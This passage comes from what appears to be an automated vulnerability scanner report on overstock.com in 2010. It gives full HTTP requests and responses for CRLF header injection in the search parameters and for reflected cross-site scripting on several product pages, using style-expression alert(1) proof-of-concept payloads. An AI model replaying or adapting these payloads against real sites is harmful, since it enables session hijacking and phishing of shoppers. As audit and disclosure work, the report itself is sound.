%26searchtype%3DHeader%26taxonomy%3D|searchhistory^keywords"; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 63404

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j40.overstock.com ssl:f
...[SNIP]...

1.3. http://www.overstock.com/search [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /search

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Set-Cookie response header. The payload ca02f%0d%0aa7c5d88fad3 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /search?taxonomy=&keywords=%60&SearchType=Header&ca02f%0d%0aa7c5d88fad3=1 HTTP/1.1
Host: www.overstock.com
Proxy-Connection: keep-alive
Referer: http://www.overstock.com/Sports-Toys/5/store.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSLB=B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; clubogiftcards=clubogctotal^0.00; se_list=se_list^0|2|; s_pers=%20gpv_p13%3DHomePage%2520-%2520New%2520Untracked%7C1289343466851%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doverstock.com%253D%252526pid%25253DHomePage%25252520-%25252520New%25252520Untracked%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.overstock.com/Sports-Toys/5/store.html%252526ot%25253DA%3B; ostk_aggr_session=csbshow^0|mxcshopmore^Sports-Toys/5/store.html|searchhistory^categories; cinfo=ccnt^0:ctmst^1289320132943; mxclastvisit=20101109; mxcsurftype=2

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:49:14 GMT
Server: Apache
Expires: Tue, 09 Nov 2010 16:49:14 GMT
Pragma: no-cache
Set-Cookie: mxclastvisit=20101109; Domain=.overstock.com; Expires=Wed, 09-Nov-2011 16:49:14 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289321354456; Domain=.overstock.com; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_aggr_session="csbshow^0|mxcshopmore^/search%3Fkeywords%3D`%26searchtype%3DHeader%26ca02f
a7c5d88fad3
%3D1%26taxonomy%3D|searchhistory^keywords"; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=2; Domain=.overstock.com; Path=/
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 63224

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j38.overstock.com ssl:f
...[SNIP]...

1.4. http://www.overstock.com/search [taxonomy parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /search

Issue detail

The value of the taxonomy request parameter is copied into the Set-Cookie response header. The payload f7bc4%0d%0a1641d061be5 was submitted in the taxonomy parameter. This caused a response containing an injected HTTP header.

Request

GET /search?taxonomy=f7bc4%0d%0a1641d061be5&keywords=%60&SearchType=Header HTTP/1.1
Host: www.overstock.com
Proxy-Connection: keep-alive
Referer: http://www.overstock.com/Sports-Toys/5/store.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSLB=B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; clubogiftcards=clubogctotal^0.00; se_list=se_list^0|2|; s_pers=%20gpv_p13%3DHomePage%2520-%2520New%2520Untracked%7C1289343466851%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doverstock.com%253D%252526pid%25253DHomePage%25252520-%25252520New%25252520Untracked%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.overstock.com/Sports-Toys/5/store.html%252526ot%25253DA%3B; ostk_aggr_session=csbshow^0|mxcshopmore^Sports-Toys/5/store.html|searchhistory^categories; cinfo=ccnt^0:ctmst^1289320132943; mxclastvisit=20101109; mxcsurftype=2

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:29:49 GMT
Server: Apache
Expires: Tue, 09 Nov 2010 16:29:49 GMT
Pragma: no-cache
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289320189875; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_aggr_session="csbshow^0|mxcshopmore^/search%3Fkeywords%3D`%26searchtype%3DHeader%26taxonomy%3Df7bc4
1641d061be5
|searchhistory^categories,keywords"; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101109; Domain=.overstock.com; Expires=Wed, 09-Nov-2011 16:29:49 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=2; Domain=.overstock.com; Path=/
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 63224

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j33.overstock.com ssl:f
...[SNIP]...

2. Cross-site scripting (reflected)  previous
There are 536 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://www.overstock.com/Baby/Blossom-Flower-13-piece-Crib-Bedding-Set/5230750/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Baby/Blossom-Flower-13-piece-Crib-Bedding-Set/5230750/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38bd5"style%3d"x%3aexpression(alert(1))"b9c237e34ca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 38bd5"style="x:expression(alert(1))"b9c237e34ca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Baby/Blossom-Flower-13-piece-Crib-Bedding-Set/5230750/product.html?38bd5"style%3d"x%3aexpression(alert(1))"b9c237e34ca=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:04:10 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:04:10 GMT
Pragma: no-cache
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289405050856:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:04:10 GMT; Path=/
Set-Cookie: mxcproclicks=5230750|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:04:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Keep-Alive: timeout=5, max=50
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 107662

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j13.overstock.com ssl:false -->


<head>

<title>Bl
...[SNIP]...
<input type="hidden" name="38bd5"style="x:expression(alert(1))"b9c237e34ca" value="1"/>
...[SNIP]...

2.2. http://www.overstock.com/Baby/Cybex-Oynx-Lightweight-Stroller-in-Slate/5148023/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Baby/Cybex-Oynx-Lightweight-Stroller-in-Slate/5148023/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68f6f"style%3d"x%3aexpression(alert(1))"31807ecf3d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 68f6f"style="x:expression(alert(1))"31807ecf3d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Baby/Cybex-Oynx-Lightweight-Stroller-in-Slate/5148023/product.html?68f6f"style%3d"x%3aexpression(alert(1))"31807ecf3d6=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:03:07 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:03:07 GMT
Pragma: no-cache
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289404987817:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:03:07 GMT; Path=/
Set-Cookie: mxcproclicks=5148023|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:03:07 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Keep-Alive: timeout=5, max=50
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 110949

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j13.overstock.com ssl:false -->


<head>

<title>Cy
...[SNIP]...
<input type="hidden" name="68f6f"style="x:expression(alert(1))"31807ecf3d6" value="1"/>
...[SNIP]...

2.3. http://www.overstock.com/Baby/Eddie-Bauer-Rocking-Wood-Bassinet/5033926/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Baby/Eddie-Bauer-Rocking-Wood-Bassinet/5033926/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48c3e"style%3d"x%3aexpression(alert(1))"fb347059ff4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 48c3e"style="x:expression(alert(1))"fb347059ff4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Baby/Eddie-Bauer-Rocking-Wood-Bassinet/5033926/product.html?48c3e"style%3d"x%3aexpression(alert(1))"fb347059ff4=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:03:16 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:03:16 GMT
Pragma: no-cache
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289404996067:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:03:16 GMT; Path=/
Set-Cookie: mxcproclicks=5033926|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:03:16 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Keep-Alive: timeout=5, max=50
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 102375

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j13.overstock.com ssl:false -->


<head>

<title>Ed
...[SNIP]...
<input type="hidden" name="48c3e"style="x:expression(alert(1))"fb347059ff4" value="1"/>
...[SNIP]...

2.4. http://www.overstock.com/Baby/Fisher-Price-Zen-Collection-Cradle-Swing/5042811/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Baby/Fisher-Price-Zen-Collection-Cradle-Swing/5042811/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9101"style%3d"x%3aexpression(alert(1))"646300c3d51 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b9101"style="x:expression(alert(1))"646300c3d51 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Baby/Fisher-Price-Zen-Collection-Cradle-Swing/5042811/product.html?b9101"style%3d"x%3aexpression(alert(1))"646300c3d51=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:04:19 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:04:19 GMT
Pragma: no-cache
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:04:19 GMT; Path=/
Set-Cookie: mxcproclicks=5042811|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:04:19 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289405059596:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=14
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 104230

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j11.overstock.com ssl:false -->


<head>

<title>Fi
...[SNIP]...
<input type="hidden" name="b9101"style="x:expression(alert(1))"646300c3d51" value="1"/>
...[SNIP]...

2.5. http://www.overstock.com/Baby/Safety-1st-Alpha-Omega-Elite-Convertible-Car-Seat-in-Triton/3514162/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Baby/Safety-1st-Alpha-Omega-Elite-Convertible-Car-Seat-in-Triton/3514162/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 197a6"style%3d"x%3aexpression(alert(1))"7f8de40b4e8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 197a6"style="x:expression(alert(1))"7f8de40b4e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Baby/Safety-1st-Alpha-Omega-Elite-Convertible-Car-Seat-in-Triton/3514162/product.html?197a6"style%3d"x%3aexpression(alert(1))"7f8de40b4e8=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:04:09 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:04:09 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289405049241:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=3514162|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:04:09 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:04:09 GMT; Path=/
Keep-Alive: timeout=5, max=58
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 111108

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j12.overstock.com ssl:false -->


<head>

<title>Sa
...[SNIP]...
<input type="hidden" name="197a6"style="x:expression(alert(1))"7f8de40b4e8" value="1"/>
...[SNIP]...

2.6. http://www.overstock.com/Clothing-Shoes/Adi-Designs-Womens-Lug-Sole-Microsuede-Boots/4034996/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
